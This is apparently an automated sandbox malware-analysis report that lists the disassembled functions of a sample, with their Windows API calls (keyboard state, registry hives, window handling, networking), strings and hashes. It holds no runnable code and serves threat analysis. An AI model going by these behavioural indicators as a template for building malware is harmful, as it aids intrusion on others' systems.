                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharUpper
                    • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                    • API String ID: 3964851224-909552448
                    • Opcode ID: 077f81b1908018ef44c2baa9e17829a24a1dcfdb425b421b42498599cec25362
                    • Instruction ID: 39a9a273076effb39ea1ed6a75be510e7c747e9b6ef0c3be67f5bd094153e2b9
                    • Opcode Fuzzy Hash: 077f81b1908018ef44c2baa9e17829a24a1dcfdb425b421b42498599cec25362
                    • Instruction Fuzzy Hash: 0541627124024ECBEF14FF90DD91AEA37A5BF16340F904668FD915B292DB38AD1ACB50
                    Function 006E5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                      • Part of subcall function 00687A84: _memmove.LIBCMT ref: 00687B0D
                    • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 006E55D2
                    • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 006E55E8
                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 006E55F9
                    • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 006E560B
                    • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 006E561C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: SendString$_memmove
                    • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                    • API String ID: 2279737902-1007645807
                    • Opcode ID: d87c8c80fffda66c5b2523c8d75d71f647922dcd127de0b76996a9ecf1c7ad32
                    • Instruction ID: 56cda975786b40d39fb3f3c2c90991be3e66f506123b644014f31e332b9480d8
                    • Opcode Fuzzy Hash: d87c8c80fffda66c5b2523c8d75d71f647922dcd127de0b76996a9ecf1c7ad32
                    • Instruction Fuzzy Hash: E81104605902A979E720B662CC8ACFF7B7DEF91F00F40052DB445A20D2DE644D05CAA1
                    Function 006E48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                    • String ID: 0.0.0.0
                    • API String ID: 208665112-3771769585
                    • Opcode ID: 8e3e4e7548143e734ca96b63771e1a2f805787208f3bbb3a1c07d236037c6ed6
                    • Instruction ID: 1bf85962cd927e3b515e0a8598abb398339b59541bca3d2a40a2daf0226bb4cc
                    • Opcode Fuzzy Hash: 8e3e4e7548143e734ca96b63771e1a2f805787208f3bbb3a1c07d236037c6ed6
                    • Instruction Fuzzy Hash: 3811D531904215EFCB20EB359C4AEDB77AD9F41710F0442B9F445A6192EF749E818A65
                    Function 006E5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • timeGetTime.WINMM ref: 006E521C
                      • Part of subcall function 006A0719: timeGetTime.WINMM(?,75C0B400,00690FF9), ref: 006A071D
                    • Sleep.KERNEL32(0000000A), ref: 006E5248
                    • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 006E526C
                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 006E528E
                    • SetActiveWindow.USER32 ref: 006E52AD
                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 006E52BB
                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 006E52DA
                    • Sleep.KERNEL32(000000FA), ref: 006E52E5
                    • IsWindow.USER32 ref: 006E52F1
                    • EndDialog.USER32(00000000), ref: 006E5302
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                    • String ID: BUTTON
                    • API String ID: 1194449130-3405671355
                    • Opcode ID: 76b6bf681e0b66170366a5ecc26f2e1d29e3151e9f5354ba6355cda2c56b5ecd
                    • Instruction ID: bfff86a443691b454fe039e4f9e360426f1791a3142c562131bd730bd1dc6d60
                    • Opcode Fuzzy Hash: 76b6bf681e0b66170366a5ecc26f2e1d29e3151e9f5354ba6355cda2c56b5ecd
                    • Instruction Fuzzy Hash: 6321D774205744EFE7105F21EC88A267B6AFB4634AF008529F102866B1DFA99D10CB6A
                    Function 006ED7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                    • CoInitialize.OLE32(00000000), ref: 006ED855
                    • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 006ED8E8
                    • SHGetDesktopFolder.SHELL32(?), ref: 006ED8FC
                    • CoCreateInstance.OLE32(00712D7C,00000000,00000001,0073A89C,?), ref: 006ED948
                    • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 006ED9B7
                    • CoTaskMemFree.OLE32(?,?), ref: 006EDA0F
                    • _memset.LIBCMT ref: 006EDA4C
                    • SHBrowseForFolderW.SHELL32(?), ref: 006EDA88
                    • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 006EDAAB
                    • CoTaskMemFree.OLE32(00000000), ref: 006EDAB2
                    • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 006EDAE9
                    • CoUninitialize.OLE32(00000001,00000000), ref: 006EDAEB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                    • String ID:
                    • API String ID: 1246142700-0
                    • Opcode ID: c9480cd237a87b97ad5c3e2d6e217aacdb478a5a893891dc4882abc6d54ab958
                    • Instruction ID: aff50f1a917a41fd3c6b0e7be29e1ce1e9d10d69d5430d48053918c0041cac88
                    • Opcode Fuzzy Hash: c9480cd237a87b97ad5c3e2d6e217aacdb478a5a893891dc4882abc6d54ab958
                    • Instruction Fuzzy Hash: 0BB10D75A00209AFDB54DFA5C888DAEBBFAFF48304B148569F909DB251DB30EE41CB54
                    Function 006E052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetKeyboardState.USER32(?), ref: 006E05A7
                    • SetKeyboardState.USER32(?), ref: 006E0612
                    • GetAsyncKeyState.USER32(000000A0), ref: 006E0632
                    • GetKeyState.USER32(000000A0), ref: 006E0649
                    • GetAsyncKeyState.USER32(000000A1), ref: 006E0678
                    • GetKeyState.USER32(000000A1), ref: 006E0689
                    • GetAsyncKeyState.USER32(00000011), ref: 006E06B5
                    • GetKeyState.USER32(00000011), ref: 006E06C3
                    • GetAsyncKeyState.USER32(00000012), ref: 006E06EC
                    • GetKeyState.USER32(00000012), ref: 006E06FA
                    • GetAsyncKeyState.USER32(0000005B), ref: 006E0723
                    • GetKeyState.USER32(0000005B), ref: 006E0731
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: State$Async$Keyboard
                    • String ID:
                    • API String ID: 541375521-0
                    • Opcode ID: ad645f4fd08b7bbe4471085bc9394c7e853a1fa28bc294d1176ffa7cd874f60d
                    • Instruction ID: 7ca18cef6b88853d2b73a8001599971dfd1b0be78f865d83786d0a9de4aec2f7
                    • Opcode Fuzzy Hash: ad645f4fd08b7bbe4471085bc9394c7e853a1fa28bc294d1176ffa7cd874f60d
                    • Instruction Fuzzy Hash: 0451DA70A067C429FF34DBA189547EABFB69F02340F08459DD5C25B2C2DAA49ACCCB65
                    Function 006DC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                    Download Yara Rule
                    APIs
                    • GetDlgItem.USER32(?,00000001), ref: 006DC746
                    • GetWindowRect.USER32(00000000,?), ref: 006DC758
                    • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 006DC7B6
                    • GetDlgItem.USER32(?,00000002), ref: 006DC7C1
                    • GetWindowRect.USER32(00000000,?), ref: 006DC7D3
                    • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 006DC827
                    • GetDlgItem.USER32(?,000003E9), ref: 006DC835
                    • GetWindowRect.USER32(00000000,?), ref: 006DC846
                    • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 006DC889
                    • GetDlgItem.USER32(?,000003EA), ref: 006DC897
                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 006DC8B4
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 006DC8C1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$ItemMoveRect$Invalidate
                    • String ID:
                    • API String ID: 3096461208-0
                    • Opcode ID: 523a80353749f4d97bc21d8d016d86cd4d7ff4397690750258f5eedf618ee775
                    • Instruction ID: cde17c4d745d0ac40bcd668b30dbd881bcddcdf6dc3654645b3ddc3637592c53
                    • Opcode Fuzzy Hash: 523a80353749f4d97bc21d8d016d86cd4d7ff4397690750258f5eedf618ee775
                    • Instruction Fuzzy Hash: 45512E71F00209ABDB18CF69DD99AAEBBBAEB88310F14822DF515D7390DB749D00CB54
                    Function 0068201B Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00681B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00682036,?,00000000,?,?,?,?,006816CB,00000000,?), ref: 00681B9A
                    • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 006820D3
                    • KillTimer.USER32(-00000001,?,?,?,?,006816CB,00000000,?,?,00681AE2,?,?), ref: 0068216E
                    • DestroyAcceleratorTable.USER32(00000000), ref: 006BBEF6
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006816CB,00000000,?,?,00681AE2,?,?), ref: 006BBF27
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006816CB,00000000,?,?,00681AE2,?,?), ref: 006BBF3E
                    • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,006816CB,00000000,?,?,00681AE2,?,?), ref: 006BBF5A
                    • DeleteObject.GDI32(00000000), ref: 006BBF6C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                    • String ID:
                    • API String ID: 641708696-0
                    • Opcode ID: 596933e3cda85f4b3321d49d52d69a97fb52d9257a80a6add3391cafa79b08c9
                    • Instruction ID: 8990d36dcfd15f001d7573eaf74d45c53a9e054c7f970224f0a228726e6d5d39
                    • Opcode Fuzzy Hash: 596933e3cda85f4b3321d49d52d69a97fb52d9257a80a6add3391cafa79b08c9
                    • Instruction Fuzzy Hash: DF61BD74100611DFDB35AF14DD58BB9B7F7FB02302F108629E1829AA60C7B9A881CF5A
                    Function 006821A5 Relevance: 18.1, APIs: 12, Instructions: 132COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006825DB: GetWindowLongW.USER32(?,000000EB), ref: 006825EC
                    • GetSysColor.USER32(0000000F), ref: 006821D3
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ColorLongWindow
                    • String ID:
                    • API String ID: 259745315-0
                    • Opcode ID: 5032203a501cc152a854a42ea9dd508132a1422ad77cf95d63bbc5882421ba25
                    • Instruction ID: 98e3533ef65e7c887fb98d751185f15b6cb9b55d0ae000a2e2f08de58a66754d
                    • Opcode Fuzzy Hash: 5032203a501cc152a854a42ea9dd508132a1422ad77cf95d63bbc5882421ba25
                    • Instruction Fuzzy Hash: C8419471100145EADB216F28DC68BF93767EB06331F148365FD658A2E2CB358E82DB55
                    Function 006EAB12 Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 183COMMON
                    Download Yara Rule
                    APIs
                    • CharLowerBuffW.USER32(?,?,0070F910), ref: 006EAB76
                    • GetDriveTypeW.KERNEL32(00000061,0073A620,00000061), ref: 006EAC40
                    • _wcscpy.LIBCMT ref: 006EAC6A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: BuffCharDriveLowerType_wcscpy
                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                    • API String ID: 2820617543-1000479233
                    • Opcode ID: a2b6b4da1df53b345706a6caa8883597ac7eef72ad09373a5fa68acc3038dbdd
                    • Instruction ID: 534849c577dc1dcccf2801389a1f610473417d51a03b90c0ac5aa5a30ba30dd0
                    • Opcode Fuzzy Hash: a2b6b4da1df53b345706a6caa8883597ac7eef72ad09373a5fa68acc3038dbdd
                    • Instruction Fuzzy Hash: 6251CA311083419BC760FF55C882AAEB7A7EF85704F24492DF496972A2DB31ED0ACB53
                    Function 0070C27C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 149windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                      • Part of subcall function 00682344: GetCursorPos.USER32(?), ref: 00682357
                      • Part of subcall function 00682344: ScreenToClient.USER32(007467B0,?), ref: 00682374
                      • Part of subcall function 00682344: GetAsyncKeyState.USER32(00000001), ref: 00682399
                      • Part of subcall function 00682344: GetAsyncKeyState.USER32(00000002), ref: 006823A7
                    • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?), ref: 0070C2E4
                    • ImageList_EndDrag.COMCTL32 ref: 0070C2EA
                    • ReleaseCapture.USER32 ref: 0070C2F0
                    • SetWindowTextW.USER32(?,00000000), ref: 0070C39A
                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0070C3AD
                    • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?), ref: 0070C48F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                    • String ID: @GUI_DRAGFILE$@GUI_DROPID$prt$prt
                    • API String ID: 1924731296-2507818965
                    • Opcode ID: b42487a95a8859007b82776f709771c7c944a437493531b6af923da3f26a9b69
                    • Instruction ID: bbb080319989a9243c35f1af969b2e81504c0d64c028c1bc4ac8a5312e8a6398
                    • Opcode Fuzzy Hash: b42487a95a8859007b82776f709771c7c944a437493531b6af923da3f26a9b69
                    • Instruction Fuzzy Hash: 7A51AB74204305EFD714EF24C896FAA7BE5FB89310F00862DF5928B2E1CB79A944CB56
                    Function 00689997 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 146COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __i64tow__itow__swprintf
                    • String ID: %.15g$0x%p$False$True
                    • API String ID: 421087845-2263619337
                    • Opcode ID: 18fb03cd8e01513adc0ace98754d5496d2a1af20d1502848a7fb230263956be6
                    • Instruction ID: 5758a759083e1e8a43e77c88e5e33b03686c860587e0272faf8faa6e96f25e02
                    • Opcode Fuzzy Hash: 18fb03cd8e01513adc0ace98754d5496d2a1af20d1502848a7fb230263956be6
                    • Instruction Fuzzy Hash: AD41D7B1504205AFEF24BB38DC42EB673EAEF45310F28456EF549D7291EA719D42CB11
                    Function 007073C1 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 103windowCOMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 007073D9
                    • CreateMenu.USER32 ref: 007073F4
                    • SetMenu.USER32(?,00000000), ref: 00707403
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00707490
                    • IsMenu.USER32(?), ref: 007074A6
                    • CreatePopupMenu.USER32 ref: 007074B0
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 007074DD
                    • DrawMenuBar.USER32 ref: 007074E5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                    • String ID: 0$F
                    • API String ID: 176399719-3044882817
                    • Opcode ID: 5007117e66b01a399909710b6e6108e4c8cbe32a9145b527480316973e29477f
                    • Instruction ID: e15a885ee6ea9b854cf8513a97f9fbae9d5854409c222be1e068e0872d0fab63
                    • Opcode Fuzzy Hash: 5007117e66b01a399909710b6e6108e4c8cbe32a9145b527480316973e29477f
                    • Instruction Fuzzy Hash: 76415778A00249EFDB24DF64D884E9ABBF9FF49300F144229F955973A0DB38A920CF54
                    Function 0070772A Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101windowCOMMON
                    Download Yara Rule
                    APIs
                    • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 007077CD
                    • CreateCompatibleDC.GDI32(00000000), ref: 007077D4
                    • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 007077E7
                    • SelectObject.GDI32(00000000,00000000), ref: 007077EF
                    • GetPixel.GDI32(00000000,00000000,00000000), ref: 007077FA
                    • DeleteDC.GDI32(00000000), ref: 00707803
                    • GetWindowLongW.USER32(?,000000EC), ref: 0070780D
                    • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00707821
                    • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0070782D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                    • String ID: static
                    • API String ID: 2559357485-2160076837
                    • Opcode ID: 48ea302791e75343a6c195b7716225ae4857ecc827373df24a752998d723f16a
                    • Instruction ID: 75b548bd8ee52e049ba00a3181e8f3b6046ea396089d3644c92035278fa06843
                    • Opcode Fuzzy Hash: 48ea302791e75343a6c195b7716225ae4857ecc827373df24a752998d723f16a
                    • Instruction Fuzzy Hash: 57318E31504115EBDF269F64DC08FDA3BA9FF09364F108324FA15A60E0CB39E821DBA8
                    Function 006A7040 Relevance: 16.8, APIs: 11, Instructions: 258COMMON
                    Download Yara Rule
                    APIs
                    • _memset.LIBCMT ref: 006A707B
                      • Part of subcall function 006A8D68: __getptd_noexit.LIBCMT ref: 006A8D68
                    • __gmtime64_s.LIBCMT ref: 006A7114
                    • __gmtime64_s.LIBCMT ref: 006A714A
                    • __gmtime64_s.LIBCMT ref: 006A7167
                    • __allrem.LIBCMT ref: 006A71BD
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A71D9
                    • __allrem.LIBCMT ref: 006A71F0
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A720E
                    • __allrem.LIBCMT ref: 006A7225
                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006A7243
                    • __invoke_watson.LIBCMT ref: 006A72B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
